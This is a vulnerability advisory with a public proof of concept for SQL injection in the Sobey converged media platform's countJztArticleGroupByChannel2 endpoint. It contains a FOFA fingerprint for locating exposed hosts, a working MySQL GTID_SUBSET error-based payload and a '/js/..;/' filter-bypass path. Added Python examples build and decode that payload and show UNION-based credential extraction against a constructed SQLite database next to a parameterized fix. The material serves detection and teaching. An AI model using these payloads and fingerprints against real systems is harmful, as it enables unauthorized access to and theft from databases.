suobei-rongmeiti-countjzt-articlegroupbychannel2-sqli: Sobey converged media platform (索贝融媒体) countJztArticleGroupByChannel2 SQL injection vulnerability

Date: 2025-09-01 | Affected software: Sobey converged media platform | PoC: public

Vulnerability description

The /sobey-mchEditor/mch/Jzt/statistics/countJztArticleGroupByChannel2 endpoint in Sobey products is vulnerable to SQL injection. An attacker who supplies crafted SQL can read sensitive data from the database and may be able to take full control of it. In the public PoC below, the injection point is the channelId parameter: the payload is a MySQL error-based probe (GTID_SUBSET over a marker string), the endpoint is reached through a /js/..;/ path segment that servers with Tomcat-style path handling normalise away, and a marker echoed back in the HTTP 500 error page confirms the injection.

FOFA fingerprint: icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"
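The following is an added example, not code from Sobey or from the PoC author, showing why pasting channelId into the statement text is exploitable and what the parameterized form looks like. The real backend, schema and SQL dialect are unknown, so an in-memory SQLite database with constructed rows stands in, and the function names (count_by_channel_vulnerable, count_by_channel_fixed) are hypothetical. The page's own payload is MySQL-specific (GTID_SUBSET), which SQLite cannot run, so a boolean payload and a UNION payload illustrate the same root cause.

```python
"""Added example (hypothetical reconstruction, not the vendor's code):
string-concatenated channelId versus a bound parameter."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in schema: an article table plus an unrelated
    credentials table that an injected query can reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER, channel_id INTEGER, title TEXT);
        INSERT INTO article VALUES (1, 1, 'published-a'), (2, 1, 'published-b'),
                                   (3, 7, 'unpublished-draft');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-hash-value');
    """)
    return conn


def count_by_channel_vulnerable(conn: sqlite3.Connection, channel_id: str) -> list:
    """Flawed pattern: the raw request parameter is concatenated into SQL text."""
    sql = ("SELECT channel_id, COUNT(*) FROM article "
           f"WHERE channel_id = {channel_id} GROUP BY channel_id")
    return conn.execute(sql).fetchall()


def count_by_channel_fixed(conn: sqlite3.Connection, channel_id: str) -> list:
    """Hardened form: type-check the parameter, then bind it, so its value
    can never alter the structure of the statement."""
    cid = int(channel_id)  # ValueError for anything that is not an integer
    sql = ("SELECT channel_id, COUNT(*) FROM article "
           "WHERE channel_id = ? GROUP BY channel_id")
    return conn.execute(sql, (cid,)).fetchall()


def demo() -> dict:
    """Run a legitimate value and two injected values through both versions."""
    conn = make_db()
    # Constructed payloads: a boolean bypass and a UNION-based exfiltration.
    bypass = "1 OR 1=1"
    exfil = "1 UNION SELECT username, password_hash FROM users--"
    out = {
        "legit": count_by_channel_vulnerable(conn, "1"),
        "bypass": count_by_channel_vulnerable(conn, bypass),   # leaks channel 7
        "exfil": count_by_channel_vulnerable(conn, exfil),     # leaks users row
        "fixed_legit": count_by_channel_fixed(conn, "1"),
    }
    try:
        count_by_channel_fixed(conn, exfil)
        out["fixed_exfil"] = "executed"
    except ValueError:
        out["fixed_exfil"] = "rejected"
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The `--` in the UNION payload comments out the trailing `GROUP BY`, which is why the injected statement still parses; the fixed version never reaches the database with that input because `int()` rejects it, and even a well-formed integer is passed as a bound parameter rather than spliced into the query text.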

PoC [public]

id: suobei-rongmeiti-countjzt-articlegroupbychannel2-sqli

info:
  name: Sobey converged media platform countJztArticleGroupByChannel2 SQL injection vulnerability
  author: avic123
  severity: high
  verified: true
  description: |-
    The /sobey-mchEditor/mch/Jzt/statistics/countJztArticleGroupByChannel2 endpoint in Sobey products is vulnerable to SQL injection. An attacker who supplies crafted SQL can read sensitive data from the database and may be able to take full control of it.
    fofa:icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"
  reference:
    - https://mrxn.net/jswz/sobey-Jzt-statistics-countJztArticleGroupByChannel2-sqli.html
  tags: suobei,sqli
  created: 2025/09/15

rules:
  r0:
    request:
      method: GET
      # "/js/..;/" is a path-normalization trick: on Tomcat-style servers ";"
      # starts a path parameter that is stripped, and ".." then steps back out
      # of /js/, so the servlet resolves /sobey-mchEditor/mch/Jzt/statistics/...
      # while a filter matching the raw path still sees /js/. It is typically
      # used to slip past filters that exempt static paths.
      # channelId is sent twice; the second copy carries the percent-encoded
      # payload, which decodes to:
      #   1 AND GTID_SUBSET(CONCAT(0x717a6a6b71,(SELECT (ELT(6027=6027,1))),0x7171707171),6027)
      # 0x717a6a6b71 = "qzjkq", 0x7171707171 = "qqpqq" (MySQL error-based oracle).
      path: /sobey-mchEditor/js/..;/mch/Jzt/statistics/countJztArticleGroupByChannel2?siteCode=&token=&userCode=admin&channelId=1&catalogid=1&channelId=%31%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%37%31%37%61%36%61%36%62%37%31%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%30%32%37%3d%36%30%32%37%2c%31%29%29%29%2c%30%78%37%31%37%31%37%30%37%31%37%31%29%2c%36%30%32%37%29
    # ELT(6027=6027,1) evaluates to 1, so CONCAT() yields "qzjkq1qqpqq". That is
    # not a GTID set, so GTID_SUBSET() fails with MySQL's "Malformed GTID set
    # specification" error; a backend that echoes the database error into its
    # 500 response returns the marker "qzjkq1".
    expression: |
      response.status == 500  && response.body.bcontains(b'qzjkq1')
expression: r0()
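As an added example, not part of the original advisory or the PoC author's rule, the following Python shows how the error-based payload in the rule above is built, decodes the percent-encoded channelId from the PoC request line, and re-implements the rule's `expression` as a checker. Nothing is sent over the network: the request path is copied from the rule, and the 500 response body is constructed here to show the shape of a MySQL error leaking into a JSON error page. The function names (build_gtid_payload, injected_channel_id, matches_rule) are hypothetical.

```python
"""Added example (not from the advisory or the rule author): construction,
decoding and detection logic for the GTID_SUBSET error-based payload."""
from urllib.parse import parse_qsl, urlsplit

# Request line copied from the rule above (split only for line length).
POC_PATH = (
    "/sobey-mchEditor/js/..;/mch/Jzt/statistics/countJztArticleGroupByChannel2"
    "?siteCode=&token=&userCode=admin&channelId=1&catalogid=1&channelId="
    "%31%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28"
    "%30%78%37%31%37%61%36%61%36%62%37%31%2c%28%53%45%4c%45%43%54%20%28%45%4c%54"
    "%28%36%30%32%37%3d%36%30%32%37%2c%31%29%29%29%2c%30%78%37%31%37%31%37%30%37"
    "%31%37%31%29%2c%36%30%32%37%29"
)


def hexlit(s: str) -> str:
    """MySQL hex literal (0x...) for an ASCII string, so the marker needs no quotes."""
    return "0x" + s.encode("ascii").hex()


def build_gtid_payload(prefix: str, suffix: str, n: int = 6027, base: str = "1") -> str:
    """MySQL error-based oracle in the shape the rule uses.

    ELT(n=n,1) returns 1 because the condition is true, so CONCAT() yields
    prefix + "1" + suffix. That string is not a GTID set, so GTID_SUBSET()
    raises "Malformed GTID set specification '<prefix>1<suffix>'" and an
    application that surfaces the database error echoes the marker back.
    Replacing n=n with another condition turns this into a boolean oracle."""
    return (f"{base} AND GTID_SUBSET(CONCAT({hexlit(prefix)},"
            f"(SELECT (ELT({n}={n},1))),{hexlit(suffix)}),{n})")


def injected_channel_id(path: str) -> str:
    """Decode the value of the *last* channelId parameter. The rule sends
    channelId twice; the second copy carries the percent-encoded payload."""
    pairs = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    return [v for k, v in pairs if k == "channelId"][-1]


def marker(prefix: str) -> bytes:
    """What the rule's expression looks for: the prefix followed by ELT()'s 1."""
    return (prefix + "1").encode()


def matches_rule(status: int, body: bytes, prefix: str = "qzjkq") -> bool:
    """Python equivalent of the rule's CEL expression:
    response.status == 500 && response.body.bcontains(b'qzjkq1')"""
    return status == 500 and marker(prefix) in body


# Constructed example response, not a capture from a real host: the shape a
# backend that surfaces the JDBC/MySQL error in its error page would return.
CONSTRUCTED_500_BODY = (
    b'{"timestamp":"2025-09-01T00:00:00Z","status":500,"error":"Internal Server Error",'
    b'"message":"Malformed GTID set specification \'qzjkq1qqpqq\'."}'
)


def demo() -> dict:
    """Decode the rule's payload, rebuild it from its markers, and run the checker."""
    decoded = injected_channel_id(POC_PATH)
    return {
        "decoded": decoded,
        "rebuilt_matches": decoded == build_gtid_payload("qzjkq", "qqpqq"),
        "hit": matches_rule(500, CONSTRUCTED_500_BODY),
        "miss_status": matches_rule(200, CONSTRUCTED_500_BODY),
        "miss_body": matches_rule(500, b'{"status":500,"message":"timeout"}'),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Because the detection keys on a marker that only appears if the database actually evaluated the injected expression, a generic 500 (timeout, unrelated exception) does not produce a false positive; conversely, a target that swallows database errors will not match this rule even if the endpoint is injectable, so a negative result from the rule is not proof the endpoint is safe.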
